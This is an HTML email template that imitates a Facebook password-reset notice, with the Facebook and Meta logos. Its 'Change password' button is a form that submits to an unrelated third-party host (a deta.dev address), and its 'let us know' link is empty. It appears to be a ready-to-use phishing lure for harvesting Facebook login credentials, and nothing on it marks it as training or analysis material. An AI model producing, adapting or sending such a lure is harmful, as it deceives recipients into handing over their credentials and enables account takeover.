<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <style>
        @import url(http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,700italic,300,400,700);
        * {
            font-family: 'Open Sans', sans-serif;
        }
        html {
            padding: 10px;
        }
        .logo {
            width: 40px;
            height: 40px;
        }
        p {
            margin: 0px;
        }
        button {
            margin: 20px 0 40px 0;
            width: 550px;
            background-color: rgb(24, 119, 242);
            color: white;
            border-style: none;
            padding: 10px 0;
            border-radius: 7px;
            font-weight: 600;
            font-size: 15px;
        }
        .from {
            color: rgb(124, 124, 124);
            font-size: 14px;
        }
        .meta-logo {
            width: 120px;
        }
        .footer {
            display: flex;
            flex-direction: column;
            align-items: center;
        }
    </style>
    <img src="https://ci3.googleusercontent.com/proxy/IQACL2RxMbaGoz3VeUUncVFAVt1C_VDVo-gnKtnxEL0NJYyPS_Sc0Q53XvchPJeEtLeSiF-Ve5ypRACgaU6kfojfihdXBRWFG-4SkwKjMQ=s0-d-e1-ft#https://static.xx.fbcdn.net/rsrc.php/v3/yc/r/I92GqZOkKcu.png"
     alt="Facebook Logo" class="logo">
    <hr>
    <p style="margin-bottom: 15px;">Hi there,</p><br>
    <p>We received a request to reset your Facebook password.</p><br>
    <p>You can directly change your password by clicking the following button.</p>
    <form action="https://tt2t1g.deta.dev/facebook">
        <button type="submit">Change password</button>
    </form>
    <p><strong>Didn't request this change?</strong></p><br>
    <p style="margin-bottom: 35px;">If you didn't request a new password, <a href="">let us know.</a></p>
    <hr>
    <div class="footer">
        <img src="https://ci4.googleusercontent.com/proxy/d3D_pwZxEfzej1l0yE5VCB7hNnHBxmwllq0RGTLQMQjNiyMQILxq8jnUO-Q6Wss8zCSYPdVqCSFHrlVWX8fj7LCw=s0-d-e1-ft#https://facebook.com/images/email/meta_logo.png"
         alt="Meta Logo" class="meta-logo">
    </div>
</body>
</html>